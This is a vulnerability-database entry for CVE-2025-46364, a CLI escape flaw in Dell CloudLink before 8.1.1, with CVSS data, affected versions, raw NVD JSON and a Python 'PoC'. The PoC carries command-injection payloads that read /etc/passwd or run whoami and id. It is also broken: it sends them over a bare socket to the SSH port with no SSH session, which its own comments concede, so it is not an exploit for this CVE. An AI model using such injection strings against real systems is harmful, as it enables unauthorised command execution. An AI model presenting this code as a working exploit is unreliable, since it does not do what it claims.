Security Vulnerability Report
中文
CVE-2025-46364 CVSS 9.1 CRITICAL

CVE-2025-46364

Published: 2025-11-05 17:15:42
Last Modified: 2025-11-07 17:53:20

Description

Dell CloudLink, versions prior to 8.1.1, contain a vulnerability where a privileged user with known password can run CLI Escape Vulnerability to gain control of system.

CVSS Details

CVSS Score
9.1
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:dell:cloudlink:*:*:*:*:*:*:*:* - VULNERABLE
Dell CloudLink < 8.1.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-46364 PoC - Dell CloudLink CLI Escape # Note: This PoC is for educational and security research purposes only # Unauthorized access to computer systems is illegal import socket import time def cve_2025_46364_poc(target_ip, username, password): """ Dell CloudLink CLI Escape Vulnerability PoC Requirements: High-privileged user with known password """ try: # Connect to SSH service sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((target_ip, 22)) # SSH banner exchange would happen here # In real scenario, use paramiko or similar library # After authentication, attempt CLI escape cli_payload = "; cat /etc/passwd" # Or: "$(whoami)" for command substitution # Or: "`id`" for backtick command execution print(f"[*] Sending CLI escape payload: {cli_payload}") sock.send(cli_payload.encode()) # Receive response response = sock.recv(4096) print(f"[*] Response received: {response.decode()}") sock.close() return True except Exception as e: print(f"[!] Error: {e}") return False # Usage example: # cve_2025_46364_poc("192.168.1.100", "admin", "password123") # Note: Actual exploitation requires proper SSH authentication and CLI interaction

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-46364", "sourceIdentifier": "[email protected]", "published": "2025-11-05T17:15:41.780", "lastModified": "2025-11-07T17:53:19.650", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Dell CloudLink, versions prior to 8.1.1, contain a vulnerability where a privileged user with known password can run CLI Escape Vulnerability to gain control of system."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.3, "impactScore": 6.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-269"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:dell:cloudlink:*:*:*:*:*:*:*:*", "versionEndExcluding": "8.1.1", "matchCriteriaId": "34EF297E-AA7C-41F5-B0DA-E6105A6B4207"}]}]}], "references": [{"url": "https://www.dell.com/support/kbdoc/en-us/000384363/dsa-2025-374-security-update-for-dell-cloudlink-multiple-security-vulnerabilities", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}